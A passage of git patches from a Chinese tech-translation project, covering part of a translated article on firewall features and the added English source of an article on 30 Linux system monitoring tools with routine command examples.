+这类安全产品可以作为独立产品部署,但 IPS 功能正逐步被集成到 NGFW 中。虽然基本的防火墙技术能够识别和阻止某些类型的网络流量,但 IPS 使用更细粒度的安全措施,如签名跟踪和异常检测,来防止不必要的威胁进入公司网络。IPS 系统取代了这一技术的早期版本,即入侵检测系统(IDS),后者的重点是识别威胁而不是遏制威胁。
-### Intrusion Prevention Systems (IPS)
+### 深度包检测(DPI)
-This class of security products can be deployed as a standalone product, but IPS functionality is increasingly being integrated into NGFWs. Whereas basic firewall technologies identify and block certain types of network traffic, IPS uses more granular security measures such as signature tracing and anomaly detection to prevent unwanted threats from entering corporate networks. IPS systems have replaced the previous version of this technology, Intrusion Detection Systems (IDS) which focused more on identifying threats rather than containing them.
+DPI 可以作为 IPS 的一部分,或与 IPS 结合使用,但它仍然成为了 NGFW 的一个重要特征,因为它能够提供细粒度的流量分析能力,特别是针对流量数据包的报文头和流量数据本身的分析。DPI 还可以用来监测出站流量,以确保敏感信息不会离开公司网络,这种技术称为数据丢失预防(DLP)。
-### Deep Packet Inspection (DPI)
+### SSL 检测
-DPI can be part of or used in conjunction with an IPS, but its nonetheless become an important feature of NGFWs because of the ability to provide granular analysis of traffic, most specifically the headers of traffic packets and traffic data. DPI can also be used to monitor outbound traffic to ensure sensitive information is not leaving corporate networks, a technology referred to as Data Loss Prevention (DLP).
+安全套接字层(SSL)检测是一种通过检查加密流量来检测威胁的方法。随着越来越多的流量被加密,SSL 检测正在成为 NGFW 所实施的 DPI 技术的一个重要组成部分。SSL 检测充当一个缓冲区,它在流量被送到最终目的地之前先将其解密,以便对其进行检测。
-### SSL Inspection
-
-Secure Sockets Layer (SSL) Inspection is the idea of inspecting encrypted traffic to test for threats. As more and more traffic is encrypted, SSL Inspection is becoming an important component of DPI technology that is being implemented in NGFWs. SSL Inspection acts as a buffer that unencrypts the traffic before it's delivered to the final destination to test it.
-
-### Sandboxing
-
-This is one of the newer features being rolled into NGFWs and refers to the ability of a firewall to take certain unknown traffic or code and run it in a test environment to determine if it is nefarious.
+### 沙盒
+这是被集成进 NGFW 的较新的特性之一,它指的是防火墙能够接收某些未知的流量或代码,并在一个测试环境中运行它,以确定它是否是恶意的。
--------------------------------------------------------------------------------
via: https://www.networkworld.com/article/3230457/lan-wan/what-is-a-firewall-perimeter-stateful-inspection-next-generation.html
作者:[Brandon Butler][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[zjon](https://github.com/zjon)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From fed92b66a49259e615f3bdc817a3c2439599dd3b Mon Sep 17 00:00:00 2001
From: zjon
Date: Mon, 8 Jan 2018 12:31:13 +0800
Subject: [PATCH 160/371] translated
---
{sources => translated}/tech/20171011 What is a firewall.md | 2 --
1 file changed, 2 deletions(-)
rename {sources => translated}/tech/20171011 What is a firewall.md (99%)
diff --git a/sources/tech/20171011 What is a firewall.md b/translated/tech/20171011 What is a firewall.md
similarity index 99%
rename from sources/tech/20171011 What is a firewall.md
rename to translated/tech/20171011 What is a firewall.md
index df864cf54c..cdbf18a5c9 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/translated/tech/20171011 What is a firewall.md
@@ -1,5 +1,3 @@
-Translating by zjon
-
什么是防火墙?
=====
基于网络的防火墙已经在美国企业无处不在,因为它们证实了抵御日益增长的威胁的防御能力。
From 0b3e849d1a5f37bbeda503bb0b51581b3d3cb2b4 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Mon, 8 Jan 2018 12:55:22 +0800
Subject: [PATCH 161/371] =?UTF-8?q?=E9=87=8D=E6=96=B0=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
放弃翻译,重新进入选题
---
sources/tech/20090127 Anatomy of a Program in Memory.md | 3 ---
1 file changed, 3 deletions(-)
diff --git a/sources/tech/20090127 Anatomy of a Program in Memory.md b/sources/tech/20090127 Anatomy of a Program in Memory.md
index 25d83235c0..fff0818491 100644
--- a/sources/tech/20090127 Anatomy of a Program in Memory.md
+++ b/sources/tech/20090127 Anatomy of a Program in Memory.md
@@ -1,6 +1,3 @@
-ezio is translating
-
-
Anatomy of a Program in Memory
============================================================
From b7964dfc4e2a65ab2fb4180124149dedcc25dce6 Mon Sep 17 00:00:00 2001
From: darksun
Date: Mon, 8 Jan 2018 13:00:08 +0800
Subject: [PATCH 162/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2030=20Linux=20Syst?=
=?UTF-8?q?em=20Monitoring=20Tools=20Every=20SysAdmin=20Should=20Know?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...toring Tools Every SysAdmin Should Know.md | 555 ++++++++++++++++++
1 file changed, 555 insertions(+)
create mode 100644 sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
diff --git a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
new file mode 100644
index 0000000000..ec121398d0
--- /dev/null
+++ b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
@@ -0,0 +1,555 @@
+30 Linux System Monitoring Tools Every SysAdmin Should Know
+======
+
+Need to monitor Linux server performance? Try these built-in commands and a few add-on tools. Most distributions come with tons of Linux monitoring tools. These tools provide metrics which can be used to get information about system activities. You can use these tools to find the possible causes of a performance problem. The commands discussed below are some of the most fundamental commands when it comes to system analysis and debugging Linux server issues such as:
+
+ 1. Finding out system bottlenecks
+ 2. Disk (storage) bottlenecks
+ 3. CPU and memory bottlenecks
+ 4. Network bottleneck.
+
+
+### 1. top - Process activity monitoring command
+
+The top command displays Linux processes. It provides a dynamic real-time view of a running system, i.e. actual process activity. By default, it displays the most CPU-intensive tasks running on the server and updates the list every five seconds.
+
+#### Commonly Used Hot Keys With top Linux monitoring tools
+
+Here is a list of useful hot keys:
+
+| Hot Key | Usage |
+| --- | --- |
+| `t` | Displays summary information off and on. |
+| `m` | Displays memory information off and on. |
+| `A` | Sorts the display by top consumers of various system resources. Useful for quick identification of performance-hungry tasks on a system. |
+| `f` | Enters an interactive configuration screen for top. Helpful for setting up top for a specific task. |
+| `o` | Enables you to interactively select the ordering within top. |
+| `r` | Issues renice command. |
+| `k` | Issues kill command. |
+| `z` | Turn on or off color/mono. |
+
+[How do I Find Out Linux CPU Utilization?][1]
+
+### 2. vmstat - Virtual memory statistics
+
+The vmstat command reports information about processes, memory, paging, block IO, traps, and cpu activity.
+`# vmstat 3`
+Sample Outputs:
+```
+procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
+ r b swpd free buff cache si so bi bo in cs us sy id wa st
+ 0 0 0 2540988 522188 5130400 0 0 2 32 4 2 4 1 96 0 0
+ 1 0 0 2540988 522188 5130400 0 0 0 720 1199 665 1 0 99 0 0
+ 0 0 0 2540956 522188 5130400 0 0 0 0 1151 1569 4 1 95 0 0
+ 0 0 0 2540956 522188 5130500 0 0 0 6 1117 439 1 0 99 0 0
+ 0 0 0 2540940 522188 5130512 0 0 0 536 1189 932 1 0 98 0 0
+ 0 0 0 2538444 522188 5130588 0 0 0 0 1187 1417 4 1 96 0 0
+ 0 0 0 2490060 522188 5130640 0 0 0 18 1253 1123 5 1 94 0 0
+```
+
+#### Display Memory Utilization Slabinfo
+
+`# vmstat -m`
+
+#### Get Information About Active / Inactive Memory Pages
+
+`# vmstat -a`
+[How do I find out Linux Resource utilization to detect system bottlenecks?][2]
+
+### 3. w - Find out who is logged on and what they are doing
+
+[w command][3] displays information about the users currently on the machine, and their processes.
+```
+# w username
+# w vivek
+```
+Sample Outputs:
+```
+ 17:58:47 up 5 days, 20:28, 2 users, load average: 0.36, 0.26, 0.24
+USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
+root pts/0 10.1.3.145 14:55 5.00s 0.04s 0.02s vim /etc/resolv.conf
+root pts/1 10.1.3.145 17:43 0.00s 0.03s 0.00s w
+```
+
+### 4. uptime - Tell how long the Linux system has been running
+
+uptime command can be used to see how long the server has been running. The current time, how long the system has been running, how many users are currently logged on, and the system load averages for the past 1, 5, and 15 minutes.
+`# uptime`
+Output:
+```
+ 18:02:41 up 41 days, 23:42, 1 user, load average: 0.00, 0.00, 0.00
+```
+
+A load value of 1 can be considered optimal, but the acceptable load changes from system to system: for a single-CPU system a load of 1 - 3 may be fine, while for SMP systems 6 - 10 may be acceptable.
+
+### 5. ps - Displays the Linux processes
+
+ps command will report a snapshot of the current processes. To select all processes use the -A or -e option:
+`# ps -A`
+Sample Outputs:
+```
+ PID TTY TIME CMD
+ 1 ? 00:00:02 init
+ 2 ? 00:00:02 migration/0
+ 3 ? 00:00:01 ksoftirqd/0
+ 4 ? 00:00:00 watchdog/0
+ 5 ? 00:00:00 migration/1
+ 6 ? 00:00:15 ksoftirqd/1
+....
+.....
+ 4881 ? 00:53:28 java
+ 4885 tty1 00:00:00 mingetty
+ 4886 tty2 00:00:00 mingetty
+ 4887 tty3 00:00:00 mingetty
+ 4888 tty4 00:00:00 mingetty
+ 4891 tty5 00:00:00 mingetty
+ 4892 tty6 00:00:00 mingetty
+ 4893 ttyS1 00:00:00 agetty
+12853 ? 00:00:00 cifsoplockd
+12854 ? 00:00:00 cifsdnotifyd
+14231 ? 00:10:34 lighttpd
+14232 ? 00:00:00 php-cgi
+54981 pts/0 00:00:00 vim
+55465 ? 00:00:00 php-cgi
+55546 ? 00:00:00 bind9-snmp-stat
+55704 pts/1 00:00:00 ps
+```
+
+ps is just like top but provides more information.
+
+#### Show Long Format Output
+
+`# ps -Al`
+To turn on extra full mode (it will show command line arguments passed to process):
+`# ps -AlF`
+
+#### Display Threads ( LWP and NLWP)
+
+`# ps -AlFH`
+
+#### Watch Threads After Processes
+
+`# ps -AlLm`
+
+#### Print All Process On The Server
+
+```
+# ps ax
+# ps axu
+```
+
+#### Want To Print A Process Tree?
+
+```
+# ps -ejH
+# ps axjf
+# pstree
+```
+
+#### Get Security Information of Linux Process
+
+```
+# ps -eo euser,ruser,suser,fuser,f,comm,label
+# ps axZ
+# ps -eM
+```
+
+#### Let Us Print Every Process Running As User Vivek
+
+```
+# ps -U vivek -u vivek u
+```
+
+#### Configure ps Command Output In a User-Defined Format
+
+```
+# ps -eo pid,tid,class,rtprio,ni,pri,psr,pcpu,stat,wchan:14,comm
+# ps axo stat,euid,ruid,tty,tpgid,sess,pgrp,ppid,pid,pcpu,comm
+# ps -eopid,tt,user,fname,tmout,f,wchan
+```
+
+#### Try To Display Only The Process IDs of Lighttpd
+
+`# ps -C lighttpd -o pid=`
+OR
+`# pgrep lighttpd`
+OR
+`# pgrep -u vivek php-cgi`
+
+#### Print The Name of PID 55977
+
+`# ps -p 55977 -o comm=`
+
+#### Top 10 Memory Consuming Process
+
+```
+# ps -auxf | sort -nr -k 4 | head -10
+```
+
+#### Show Us Top 10 CPU Consuming Process
+
+`# ps -auxf | sort -nr -k 3 | head -10`
+
+[Show All Running Processes in Linux][5]
+
+### 6. free - Show Linux server memory usage
+
+free command shows the total amount of free and used physical and swap memory in the system, as well as the buffers used by the kernel.
+`# free `
+Sample Output:
+```
+ total used free shared buffers cached
+Mem: 12302896 9739664 2563232 0 523124 5154740
+-/+ buffers/cache: 4061800 8241096
+Swap: 1052248 0 1052248
+```
+
+### 7. iostat - Monitor Linux average CPU load and disk activity
+
+The iostat command reports Central Processing Unit (CPU) statistics and input/output statistics for devices, partitions and network filesystems (NFS).
+`# iostat `
+Sample Outputs:
+```
+Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 06/26/2009
+
+avg-cpu: %user %nice %system %iowait %steal %idle
+ 3.50 0.09 0.51 0.03 0.00 95.86
+
+Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn
+sda 22.04 31.88 512.03 16193351 260102868
+sda1 0.00 0.00 0.00 2166 180
+sda2 22.04 31.87 512.03 16189010 260102688
+sda3 0.00 0.00 0.00 1615 0
+```
+
+[Linux Track NFS Directory / Disk I/O Stats][6]
+
+### 8. sar - Monitor, collect and report Linux system activity
+
+The sar command is used to collect, report, and save system activity information. To see network counters, enter:
+`# sar -n DEV | more`
+The network counters from the 24th:
+`# sar -n DEV -f /var/log/sa/sa24 | more`
+You can also display real time usage using sar:
+`# sar 4 5`
+Sample Outputs:
+```
+Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 06/26/2009
+
+06:45:12 PM CPU %user %nice %system %iowait %steal %idle
+06:45:16 PM all 2.00 0.00 0.22 0.00 0.00 97.78
+06:45:20 PM all 2.07 0.00 0.38 0.03 0.00 97.52
+06:45:24 PM all 0.94 0.00 0.28 0.00 0.00 98.78
+06:45:28 PM all 1.56 0.00 0.22 0.00 0.00 98.22
+06:45:32 PM all 3.53 0.00 0.25 0.03 0.00 96.19
+Average: all 2.02 0.00 0.27 0.01 0.00 97.70
+```
+
+### 9. mpstat - Monitor multiprocessor usage on Linux
+
+The mpstat command displays activities for each available processor, processor 0 being the first one. Use mpstat -P ALL to display average CPU utilization per processor:
+`# mpstat -P ALL`
+Sample Output:
+```
+Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 06/26/2009
+
+06:48:11 PM CPU %user %nice %sys %iowait %irq %soft %steal %idle intr/s
+06:48:11 PM all 3.50 0.09 0.34 0.03 0.01 0.17 0.00 95.86 1218.04
+06:48:11 PM 0 3.44 0.08 0.31 0.02 0.00 0.12 0.00 96.04 1000.31
+06:48:11 PM 1 3.10 0.08 0.32 0.09 0.02 0.11 0.00 96.28 34.93
+06:48:11 PM 2 4.16 0.11 0.36 0.02 0.00 0.11 0.00 95.25 0.00
+06:48:11 PM 3 3.77 0.11 0.38 0.03 0.01 0.24 0.00 95.46 44.80
+06:48:11 PM 4 2.96 0.07 0.29 0.04 0.02 0.10 0.00 96.52 25.91
+06:48:11 PM 5 3.26 0.08 0.28 0.03 0.01 0.10 0.00 96.23 14.98
+06:48:11 PM 6 4.00 0.10 0.34 0.01 0.00 0.13 0.00 95.42 3.75
+06:48:11 PM 7 3.30 0.11 0.39 0.03 0.01 0.46 0.00 95.69 76.89
+```
+
+[Linux display each multiple SMP CPU processors utilization individually][7].
+
+### 10. pmap - Monitor process memory usage on Linux
+
+The pmap command reports the memory map of a process. Use this command to find out causes of memory bottlenecks.
+`# pmap -d PID`
+To display process memory information for pid # 47394, enter:
+`# pmap -d 47394`
+Sample Outputs:
+```
+47394: /usr/bin/php-cgi
+Address Kbytes Mode Offset Device Mapping
+0000000000400000 2584 r-x-- 0000000000000000 008:00002 php-cgi
+0000000000886000 140 rw--- 0000000000286000 008:00002 php-cgi
+00000000008a9000 52 rw--- 00000000008a9000 000:00000 [ anon ]
+0000000000aa8000 76 rw--- 00000000002a8000 008:00002 php-cgi
+000000000f678000 1980 rw--- 000000000f678000 000:00000 [ anon ]
+000000314a600000 112 r-x-- 0000000000000000 008:00002 ld-2.5.so
+000000314a81b000 4 r---- 000000000001b000 008:00002 ld-2.5.so
+000000314a81c000 4 rw--- 000000000001c000 008:00002 ld-2.5.so
+000000314aa00000 1328 r-x-- 0000000000000000 008:00002 libc-2.5.so
+000000314ab4c000 2048 ----- 000000000014c000 008:00002 libc-2.5.so
+.....
+......
+..
+00002af8d48fd000 4 rw--- 0000000000006000 008:00002 xsl.so
+00002af8d490c000 40 r-x-- 0000000000000000 008:00002 libnss_files-2.5.so
+00002af8d4916000 2044 ----- 000000000000a000 008:00002 libnss_files-2.5.so
+00002af8d4b15000 4 r---- 0000000000009000 008:00002 libnss_files-2.5.so
+00002af8d4b16000 4 rw--- 000000000000a000 008:00002 libnss_files-2.5.so
+00002af8d4b17000 768000 rw-s- 0000000000000000 000:00009 zero (deleted)
+00007fffc95fe000 84 rw--- 00007ffffffea000 000:00000 [ stack ]
+ffffffffff600000 8192 ----- 0000000000000000 000:00000 [ anon ]
+mapped: 933712K writeable/private: 4304K shared: 768000K
+```
+
+The last line is very important:
+
+ * **mapped: 933712K** total amount of memory mapped to files
+ * **writeable/private: 4304K** the amount of private address space
+ * **shared: 768000K** the amount of address space this process is sharing with others
+
+
+
+[Linux find the memory used by a program / process using pmap command][8]
+
+### 11. netstat - Linux network and statistics monitoring tool
+
+netstat command displays network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
+```
+# netstat -tulpn
+# netstat -nat
+```
+
+### 12. ss - Network Statistics
+
+The ss command is used to dump socket statistics. It shows information similar to netstat. Please note that netstat is mostly obsolete, hence you need to use the ss command. To list all TCP and UDP sockets on Linux:
+`# ss -t -a`
+OR
+`# ss -u -a `
+Show all TCP sockets with process SELinux security contexts:
+`# ss -t -a -Z `
+See the following resources about ss and netstat commands:
+
+### 13. iptraf - Get real-time network statistics on Linux
+
+The iptraf command is an interactive, colorful IP LAN monitor. It is an ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, and others. It can provide the following info in an easy to read format:
+
+ * Network traffic statistics by TCP connection
+ * IP traffic statistics by network interface
+ * Network traffic statistics by protocol
+ * Network traffic statistics by TCP/UDP port and by packet size
+ * Network traffic statistics by Layer2 address
+
+![Fig.02: General interface statistics: IP traffic statistics by network interface ][9]
+
+![Fig.03 Network traffic statistics by TCP connection][10]
+
+[Install IPTraf on a Centos / RHEL / Fedora Linux To Get Network Statistics][11]
+
+### 14. tcpdump - Detailed network traffic analysis
+
+The tcpdump command is a simple command that dumps traffic on a network. However, you need a good understanding of the TCP/IP protocol to utilize this tool. For example, to display traffic info about DNS, enter:
+`# tcpdump -i eth1 'udp port 53'`
+View all IPv4 HTTP packets to and from port 80, i.e. print only packets that contain data, not, for example, SYN and FIN packets and ACK-only packets, enter:
+`# tcpdump 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'`
+To show all FTP sessions to 202.54.1.5, enter:
+`# tcpdump -i eth1 'dst 202.54.1.5 and (port 21 or 20)'`
+Print all HTTP session to 192.168.1.5:
+`# tcpdump -ni eth0 'dst 192.168.1.5 and tcp and port http'`
+Use [wireshark to view detailed][12] information about files, enter:
+`# tcpdump -n -i eth1 -s 0 -w output.txt src or dst port 80`
+
+### 15. iotop - Linux I/O monitor
+
+The iotop command monitors I/O usage information using the Linux kernel. It shows a table of current I/O usage sorted by processes or threads on the server.
+`$ sudo iotop`
+Sample outputs:
+![iotop monitoring linux disk read write IO][13]
+
+[Linux iotop: Check What's Stressing And Increasing Load On Your Hard Disks][14]
+
+### 16. htop - interactive process viewer
+
+htop is a free and open source ncurses-based process viewer for Linux. It is much better than top command. Very easy to use. You can select processes for killing or renicing without using their PIDs or leaving htop interface.
+`$ htop`
+Sample outputs:
+
+![htop process viewer for Linux][15]
+
+### 17. atop - Advanced Linux system & process monitor
+
+atop is a very powerful and an interactive monitor to view the load on a Linux system. It displays the most critical hardware resources from a performance point of view. You can quickly see CPU, memory, disk and network performance. It shows which processes are responsible for the indicated load concerning CPU and memory load on a process level.
+`$ atop`
+![atop Command Line Tools to Monitor Linux Performance][16]
+
+### 18. ac and lastcomm - Monitor process and login activity
+
+You must monitor process and login activity on your Linux server. The psacct or acct package contains several utilities for monitoring process activities, including:
+
+ 1. ac command : Show statistics about users' connect time
+ 2. [lastcomm command][17] : Show info about previously executed commands
+ 3. accton command : Turns process accounting on or off
+ 4. sa command : Summarizes accounting information
+
+
+
+[How to keep a detailed audit trail of what's being done on your Linux systems][18]
+
+### 19. monit - Process supervision
+
+Monit is a free and open source software that acts as process supervision. It comes with the ability to restart services which have failed. You can use Systemd, daemontools or any other such tool for the same purpose. [This tutorial shows how to install and configure monit as Process supervision on Debian or Ubuntu Linux][19].
+
+### 20. nethogs- Find out PIDs that using most bandwidth on Linux
+
+NetHogs is a small but handy net top tool. It groups bandwidth by process name such as Firefox, wget and so on. If there is a sudden burst of network traffic, start NetHogs. You will see which PID is causing bandwidth surge.
+`$ sudo nethogs`
+![nethogs linux monitoring tools open source][20]
+
+[Linux: See Bandwidth Usage Per Process With Nethogs Tool][21]
+
+### 21. iftop - Show bandwidth usage on an interface by host
+
+The iftop command listens to network traffic on a given interface name such as eth0. [It displays a table of current bandwidth usage by pairs of hosts][22].
+`$ sudo iftop`
+![iftop in action][23]
+
+### 22. vnstat - A console-based network traffic monitor
+
+vnstat is easy to use console-based network traffic monitor for Linux. It keeps a log of hourly, daily and monthly network traffic for the selected interface(s).
+`$ vnstat `
+![vnstat linux network traffic monitor][25]
+
+### 23. nmon - Linux systems administrator, tuner, benchmark tool
+
+nmon is a Linux sysadmin's ultimate tool for tuning purposes. It can show CPU, memory, network, disks, file systems, NFS, top process resources and partition information from the cli.
+`$ nmon`
+![nmon command][26]
+
+[Install and Use nmon Tool To Monitor Linux Systems Performance][27]
+
+### 24. glances - Keep an eye on Linux system
+
+glances is an open source cross-platform monitoring tool. It provides tons of information on the small screen. It can also work in client/server mode.
+`$ glances`
+![Glances][28]
+
+[Linux: Keep An Eye On Your System With Glances Monitor][29]
+
+### 25. strace - Monitor system calls on Linux
+
+Want to trace Linux system calls and signals? Try the strace command. This is useful for debugging webserver and other server problems. See how to [trace a process and][30] see what it is doing.
+
+### 26. /proc/ file system - Various Linux kernel statistics
+
+/proc file system provides detailed information about various hardware devices and other Linux kernel information. See [Linux kernel /proc][31] documentations for further details. Common /proc examples:
+```
+# cat /proc/cpuinfo
+# cat /proc/meminfo
+# cat /proc/zoneinfo
+# cat /proc/mounts
+```
+
+### 27. Nagios - Linux server/network monitoring
+
+[Nagios][32] is a popular open source computer system and network monitoring application software. You can easily monitor all your hosts, network equipment and services. It can send alerts when things go wrong and again when they get better. [FAN][33] is "Fully Automated Nagios". FAN's goal is to provide a Nagios installation including most tools provided by the Nagios community. FAN provides a CDRom image in the standard ISO format, making it easy to install a Nagios server. In addition, a wide range of tools is included in the distribution, in order to improve the user experience around Nagios.
+
+### 28. Cacti - Web-based Linux monitoring tool
+
+Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality. Cacti provides a fast poller, advanced graph templating, multiple data acquisition methods, and user management features out of the box. All of this is wrapped in an intuitive, easy to use interface that makes sense for LAN-sized installations up to complex networks with hundreds of devices. It can provide data about network, CPU, memory, logged in users, Apache, DNS servers and much more. See how [to install and configure Cacti network graphing][34] tool under CentOS / RHEL.
+
+### 29. KDE System Guard - Real-time Linux systems reporting and graphing
+
+KSysguard is a network enabled task and system monitor application for KDE desktop. This tool can be run over ssh session. It provides lots of features such as a client/server architecture that enables monitoring of local and remote hosts. The graphical front end uses so-called sensors to retrieve the information it displays. A sensor can return simple values or more complex information like tables. For each type of information, one or more displays are provided. Displays are organized in worksheets that can be saved and loaded independently from each other. So, KSysguard is not only a simple task manager but also a very powerful tool to control large server farms.
+
+![Fig.05 KDE System Guard][35]
+
+See [the KSysguard handbook][36] for detailed usage.
+
+### 30. Gnome Linux system monitor
+
+The System Monitor application enables you to display basic system information and monitor system processes, usage of system resources, and file systems. You can also use System Monitor to modify the behavior of your system. Although not as powerful as the KDE System Guard, it provides the basic information which may be useful for new users:
+
+ * Displays various basic information about the computer's hardware and software.
+ * Linux Kernel version
+ * GNOME version
+ * Hardware
+ * Installed memory
+ * Processors and speeds
+ * System Status
+ * Currently available disk space
+ * Processes
+ * Memory and swap space
+ * Network usage
+ * File Systems
+ * Lists all mounted filesystems along with basic information about each.
+
+![Fig.06 The Gnome System Monitor application][37]
+
+### Bonus: Additional Tools
+
+A few more tools:
+
+ * [nmap][38] - scan your server for open ports.
+ * [lsof][39] - list open files, network connections and much more.
+ * [ntop][40] web based tool - ntop is the best tool to see network usage in a way similar to what top command does for processes i.e. it is network traffic monitoring software. You can see network status, protocol wise distribution of traffic for UDP, TCP, DNS, HTTP and other protocols.
+ * [Conky][41] - Another good monitoring tool for the X Window System. It is highly configurable and is able to monitor many system variables including the status of the CPU, memory, swap space, disk storage, temperatures, processes, network interfaces, battery power, system messages, e-mail inboxes etc.
+ * [GKrellM][42] - It can be used to monitor the status of CPUs, main memory, hard disks, network interfaces, local and remote mailboxes, and many other things.
+ * [mtr][43] - mtr combines the functionality of the traceroute and ping programs in a single network diagnostic tool.
+ * [vtop][44] - graphical terminal activity monitor on Linux
+
+
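+A rough sketch of how a few of these might be used (package availability and exact options vary by distribution, so treat these invocations as illustrative):
+
+```
+# nmap -sT localhost        # TCP connect scan of this host's open ports
+# lsof -i :22               # which process is using port 22?
+# mtr --report example.com  # combined traceroute/ping report to a remote host
+```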
+
+Did I miss something? Please add your favorite system monitoring tool in the comments.
+
+#### About the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][45], [Facebook][46], [Google+][47].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/tips/top-linux-monitoring-tools.html
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html
+[2]:https://www.cyberciti.biz/tips/linux-resource-utilization-to-detect-system-bottlenecks.html
+[3]:https://www.cyberciti.biz/faq/unix-linux-w-command-examples-syntax-usage-2/ (See Linux/Unix w command examples for more info)
+[4]:https://www.cyberciti.biz/faq/unix-linux-pstree-command-examples-shows-running-processestree/
+[5]:https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
+[6]:https://www.cyberciti.biz/faq/howto-linux-track-nfs-client-disk-metrics/
+[7]:https://www.cyberciti.biz/faq/linux-mpstat-command-report-processors-related-statistics/
+[8]:https://www.cyberciti.biz/tips/howto-find-memory-used-by-program.html
+[9]:https://www.cyberciti.biz/media/new/tips/2009/06/iptraf3.png (Fig.02: General interface statistics: IP traffic statistics by network interface )
+[10]:https://www.cyberciti.biz/media/new/tips/2009/06/iptraf2.png (Fig.03 Network traffic statistics by TCP connection)
+[11]:https://www.cyberciti.biz/faq/install-iptraf-centos-redhat-fedora-linux/
+[12]:https://www.cyberciti.biz/faq/linux-unix-bsd-apache-tcpdump-http-packets-sniffing/
+[13]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/iotop-monitoring-linux-disk-read-write-IO.jpg
+[14]:https://www.cyberciti.biz/hardware/linux-iotop-simple-top-like-io-monitor/
+[15]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/htop-process-viewer-for-Linux.jpg
+[16]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/atop-Command-Line-Tools-to-Monitor-Linux-Performance.jpg
+[17]:https://www.cyberciti.biz/faq/linux-unix-lastcomm-command-examples-usage-syntax/ (See Linux/Unix lastcomm command examples for more info)
+[18]:https://www.cyberciti.biz/tips/howto-log-user-activity-using-process-accounting.html
+[19]:https://www.cyberciti.biz/faq/how-to-install-and-use-monit-on-ubuntudebian-linux-server/
+[20]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/nethogs-linux-monitoring-tools-open-source.jpg
+[21]:https://www.cyberciti.biz/faq/linux-find-out-what-process-is-using-bandwidth/
+[22]:https://www.cyberciti.biz/tips/linux-display-bandwidth-usage-on-network-interface-by-host.html
+[23]:https://www.cyberciti.biz/media/new/images/faq/2013/11/iftop-outputs-small.gif
+[24]:https://www.cyberciti.biz/faq/centos-fedora-redhat-install-iftop-bandwidth-monitoring-tool/
+[25]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/vnstat-linux-network-traffic-monitor.jpg
+[26]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/nmon-command.jpg
+[27]:https://www.cyberciti.biz/faq/nmon-performance-analyzer-linux-server-tool/
+[28]:https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/glances-keep-an-eye-on-linux.jpg
+[29]:https://www.cyberciti.biz/faq/linux-install-glances-monitoring-tool/
+[30]:https://www.cyberciti.biz/tips/linux-strace-command-examples.html
+[31]:https://www.cyberciti.biz/files/linux-kernel/Documentation/filesystems/proc.txt
+[32]:http://www.nagios.org/
+[33]:http://fannagioscd.sourceforge.net/drupal/
+[34]:https://www.cyberciti.biz/faq/fedora-rhel-install-cacti-monitoring-rrd-software/
+[35]:https://www.cyberciti.biz/media/new/tips/2009/06/kde-systemguard-screenshot.png (Fig.05 KDE System Guard KDE task manager and performance monitor.)
+[36]:https://docs.kde.org/stable5/en/kde-workspace/ksysguard/index.html
+[37]:https://www.cyberciti.biz/media/new/tips/2009/06/gnome-system-monitor.png (Fig.06 The Gnome System Monitor application)
+[38]:https://www.cyberciti.biz/tips/linux-scanning-network-for-open-ports.html
+[39]:https://www.cyberciti.biz/tips/tag/lsof-command
+[40]:https://www.cyberciti.biz/faq/debian-ubuntu-install-ntop-network-traffic-monitoring-software/ (Debian / Ubuntu Linux Install ntop To See Network Usage / Network Status)
+[41]:https://github.com/brndnmtthws/conky
+[42]:http://gkrellm.srcbox.net/
+[43]:https://www.cyberciti.biz/tips/finding-out-a-bad-or-simply-overloaded-network-link-with-linuxunix-oses.html
+[44]:https://www.cyberciti.biz/faq/how-to-install-and-use-vtop-graphical-terminal-activity-monitor-on-linux/
+[45]:https://twitter.com/nixcraft
+[46]:https://facebook.com/nixcraft
+[47]:https://plus.google.com/+CybercitiBiz
From 140c1240624812160ca6917e3983dfdc711d1e00 Mon Sep 17 00:00:00 2001
